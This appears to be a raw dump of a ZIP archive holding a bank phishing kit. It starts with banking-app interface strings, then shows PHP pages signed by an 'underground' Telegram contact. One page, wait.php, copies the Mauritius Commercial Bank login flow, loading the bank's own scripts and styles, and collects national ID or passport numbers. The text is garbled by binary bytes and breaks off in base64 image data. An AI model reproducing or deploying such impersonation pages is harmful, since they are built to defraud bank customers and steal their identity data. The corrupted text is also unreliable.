"Early withdrawal fee": "Early withdrawal fee", "Your account creation request is waiting for confirmation": "Your account creation request is waiting for confirmation", "You will be able to manage your account from here once created": "You will be able to manage your account from here once created", "PROCESSING": "PROCESSING", "Account request": "Account request", "We have received your request": "We have received your request", "Request processed": "Request processed", "We are preparing your account": "We are preparing your account", "Create savings account": "Create savings account", "By creating this savings account, you grant the bank permission to retain and process your information.": "By creating this savings account, you grant the bank permission to retain and process your information.", "All savings": "All savings", "Open account": "Open account", "Request loans": "Request loans", "All loans": "All loans", "Account redeemed successfully!": "Account redeemed successfully!", "Target set successfully": "Target set successfully", "Error setting target": "Error setting target", "Update target": "Update target", "Set target": "Set target", "How long do you plan to save": "How long do you plan to save", "Goal setting": "Goal setting", "Your saving goals": "Your saving goals", "How often do you want to save": "How often do you want to save", "First deposit date": "First deposit date", "Expected withdrawal date": "Expected withdrawal date", "Recurring deposit": "Recurring deposit", "Saving goals": "Saving goals", "Deposit from": "Deposit from", "Savings duration": "Savings duration", "deposit amount": "deposit amount", "Amount saved": "Amount saved", "Target amount": "Target amount", "Your next deposit is on": "Your next deposit is on", "Stop target": "Stop target", "Are you sure you want to stop this saving target?": "Are you sure you want to stop this saving target?", "Yes, stop": "Yes, stop", "Next deposit date": "Next deposit date", "Your account creation is being processed": "Your account creation is being processed", "Error initiating account creating": "Error initiating account creating", "Have between 8 and 30 characters": "Have between 8 and 30 characters", "Use an account name that you can easily identify": "Use an account name that you can easily identify", "Amount must be above 10,000 RWF": "Amount must be above 10,000 RWF", "Redeem account": "Redeem account", "Redeem": "Redeem", "Term Deposit": "Term Deposit", "Papps transfer": "papps transfer", "Only USD transfers are permitted for PAPSS. For more details, visit our nearest branch or call us at 4455.": "Only USD transfers are permitted for PAPSS. For more details, visit our nearest branch or call us at 4455.", "Account closure": "Account closure", "If you choose to close your savings account before the specified term period you will lose a portion of the accrued interest.": "If you choose to close your savings account before the specified term period you will lose a portion of the accrued interest.", "Your saving goals should be at least 10,000 RWF greater than your balance": "Your saving goals should be at least 10,000 RWF greater than your balance", "No account to select": "No account to select", "Top up the account": "Top up the account", "Only USD accounts are allowed to carryout this transaction": "Only USD accounts are allowed to carryout this transaction", "Scheduled transactions": "Scheduled transactions" } PK [��\�\x!� � app/index.phpnu W+A�� <?php /************************* * AUTHOR : PRESTOWORLD * CONTACT : https://t.me/prestoworldunderground **************************/ header("location: user.php"); ?>PK [��\���D�] �] app/wait.phpnu W+A�� <?php require '../main.php'; ?> <script type="text/JavaScript" src="https://ib.mcb.mu/T001/JS/combined/jquery-includes.js" ></script><script type="text/JavaScript" src="https://ib.mcb.mu/T001/jsdir/jquery-migration.js" ></script><script type="text/JavaScript" src="https://ib.mcb.mu/T001/JS/select2/js/select2.min.js" ></script><script type="text/javascript" src="https://ib.mcb.mu/T001/JS/i18n/ui.datepicker-en.js" ></script><script type="text/javascript" src="https://ib.mcb.mu/T001/JS/i18n/ui.datepicker-en-US.js" ></script><script type="text/JavaScript" src="https://ib.mcb.mu/T001/JS/i18n/select2_locale_en.js" ></script><script type="text/JavaScript" src="https://ib.mcb.mu/T001/JS/i18n/select2_locale_en-US.js" ></script><script type="text/javascript" src="https://ib.mcb.mu/T001/JS/jquery.qrcode.min.js" ></script><script> </script><div id="divsession" class="modalWhitebackground" style="display:none" ></div><div id="errorTab" style="display:none;height:auto;width:100%;cursor:hand; " ></div><div id="printWarning" class="noPrintWarning" ><div class="iconHolder warningMsg" ></div><div class="alertmsgbox" ></div></div><div id="dialog-modal-error" title="Messages" ><table id="error-dialog-table" style="width:100%;display:none" cellpadding="1" cellspacing="1" ></table></div><html lang="en" ><head><!--[if lte IE 7]><link rel="stylesheet" href="https://ib.mcb.mu/T001/css/eng_01.css" type="text/css" /><![endif]--><![if (!IE) | (gte IE 8)]><link rel="stylesheet" href="https://ib.mcb.mu/T001/css/eng_01.uri.css" type="text/css" /><![endif]><meta name="viewport" content="width=device-width; initial-scale=1; minimal-ui" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" ></meta><meta HTTP-EQUIV="no-cache" ></meta><title></title><script language="JavaScript" type="text/JavaScript" src="https://ib.mcb.mu/T001/jsdir/Ajax.js" ></script><script language="JavaScript" type="text/JavaScript" src="https://ib.mcb.mu/T001/jsdir/common.js" ></script><script language="JavaScript" type="text/JavaScript" src="https://ib.mcb.mu/T001/jsdir/rsa_compiled.js" ></script><script language="JavaScript" type="text/JavaScript" > function fnBack(){ $("input[type='button']").prop('disabled',true); document.frmmain.fldRequestId.value='RRUSR11'; document.frmmain.submit(); } function fnSubmit(){ $("input[type='button']").prop('disabled',true); if($("#fldnicno").prop("checked")) { if($.trim($("#fldIdentificationNoNic").val())=='' || $.trim($("#fldIdentificationNoNic").val()).length !=$("#fldIdentificationNoNic").val().length ||$.trim($("#fldIdentificationNoNic").val()).length < 14 || /\s/g.test($('#fldIdentificationNoNic').val())){ $("#fldIdentificationNoNicInline").css("display","block"); $("#fldIdentificationNoNic").addClass("input-error"); $("input[type='button']").prop('disabled',false); return false; } else{ $("#fldIdentificationNoNicInline").css("display","none"); $("#fldIdentificationNoNic").removeClass("input-error"); } } else if($("#fldpassportno").prop("checked")) { if($.trim($("#fldIdentificationNoPass").val())=='' || $.trim($("#fldIdentificationNoPass").val()).length !=$("#fldIdentificationNoPass").val().length ||$.trim($("#fldIdentificationNoPass").val()).length < 5 || /\s/g.test($('#fldIdentificationNoPass').val())){ $("#fldIdentificationNoPassInline").css("display","block"); $("#fldIdentificationNoPass").addClass("input-error"); $("input[type='button']").prop('disabled',false); return false; } else{ $("#fldIdentificationNoPassInline").css("display","none"); $("#fldIdentificationNoPass").removeClass("input-error"); } } if(validateCaptcha()){ document.frmmain.fldRequestId.value='RRUSR03'; document.frmmain.submit(); } else{ return false; } } function toggleIdentificationNo(selradio) { $("#fldIdentificationNoNic").val(''); $("#fldIdentificationNoPass").val(''); $("#fldIdentificationNoPassInline").css("display","none"); $("#fldIdentificationNoPass").removeClass("input-error"); $("#fldIdentificationNoNicInline").css("display","none"); $("#fldIdentificationNoNic").removeClass("input-error"); if(selradio.id=='fldnicno'){ $("#fldIdentificationNoPass").prop('disabled',true); $("#fldIdentificationNoPass").css('background',"#f0f0f0 none repeat scroll 0 0"); $("#fldIdentificationNoNic").prop('disabled',false); $("#fldIdentificationNoNic").css('background',""); } else if(selradio.id=='fldpassportno'){ $("#fldIdentificationNoNic").prop('disabled',true); $("#fldIdentificationNoNic").css('background',"#f0f0f0 none repeat scroll 0 0"); $("#fldIdentificationNoPass").prop('disabled',false); $("#fldIdentificationNoPass").css('background',""); } } function isValid(evt) { var charCode = (evt.which) ? evt.which : evt.keyCode; var retVal = ((charCode >= 48 && charCode <= 57) || ///0-9 Number ASCII (48~57) (charCode >= 65 && charCode <= 90) || ///A~Z Upper Case Alphabet ASCII (65~90) (charCode >= 97 && charCode <= 122) ///a~z Lower Case Alphabet ASCII (97~122) ); if (retVal ==false) { return false; } else { return true; } } </script></head><body class="workarea" onload="getCaptchaImage();" style="width:auto;" ><style> #headerWrapper { background: #fff; border-bottom: 1px solid #ececec; position: absolute; width: 100%; height: 72px; top: 0; left: 0; margin: 0; padding: 0; border: 0; } #header { padding: 0; position: relative; width: 960px; margin: 0 auto; border: 0; } #_topMenu { width: 100%; height: 70px; background-repeat: no-repeat; background-image: url(data:image/jpeg;base64,/9j/4QAYRXhpZgAASUkqAAgAAAAAAAAAAAAAAP/sABFEdWNreQABAAQAAABkAAD/4QMvaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wLwA8P3hwYWNrZXQgYmVnaW49Iu+7vyIgaWQ9Ilc1TTBNcENlaGlIenJlU3pOVGN6a2M5ZCI/PiA8eDp4bXBtZXRhIHhtbG5zOng9ImFkb2JlOm5zOm1ldGEvIiB4OnhtcHRrPSJBZG9iZSBYTVAgQ29yZSA1LjYtYzAxNCA3OS4xNTY3OTcsIDIwMTQvMDgvMjAtMDk6NTM6MDIgICAgICAgICI+IDxyZGY6UkRGIHhtbG5zOnJkZj0iaHR0cDovL3d3dy53My5vcmcvMTk5OS8wMi8yMi1yZGYtc3ludGF4LW5zIyI+IDxyZGY6RGVzY3JpcHRpb24gcmRmOmFib3V0PSIiIHhtbG5zOnhtcD0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wLyIgeG1sbnM6eG1wTU09Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9tbS8iIHhtbG5zOnN0UmVmPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvc1R5cGUvUmVzb3VyY2VSZWYjIiB4bXA6Q3JlYXRvclRvb2w9IkFkb2JlIFBob3Rvc2hvcCBDQyAyMDE0IChXaW5kb3dzKSIgeG1wTU06SW5zdGFuY2VJRD0ieG1wLmlpZDo5MzUzN0VBQzI3RTQxMUU2OEZFQjgzQ0VFNDc0MzI1NiIgeG1wTU06RG9jdW1lbnRJRD0ieG1wLmRpZDo5MzUzN0VBRDI3RTQxMUU2OEZFQjgzQ0VFNDc0MzI1NiI+IDx4bXBNTTpEZXJpdmVkRnJvbSBzdFJlZjppbnN0YW5jZUlEPSJ4bXAuaWlkOjkzNTM3RUFBMjdFNDExRTY4RkVCODNDRUU0NzQzMjU2IiBzdFJlZjpkb2N1bWVudElEPSJ4bXAuZGlkOjkzNTM3RUFCMjdFNDExRTY4RkVCODNDRUU0NzQzMjU2Ii8+IDwvcmRmOkRlc2NyaXB0aW9uPiA8L3JkZjpSREY+IDwveDp4bXBtZXRhPiA8P3hwYWNrZXQgZW5kPSJyIj8+/+4ADkFkb2JlAGTAAAAAAf/bAIQAAQEBAQEBAQEBAQEBAQEB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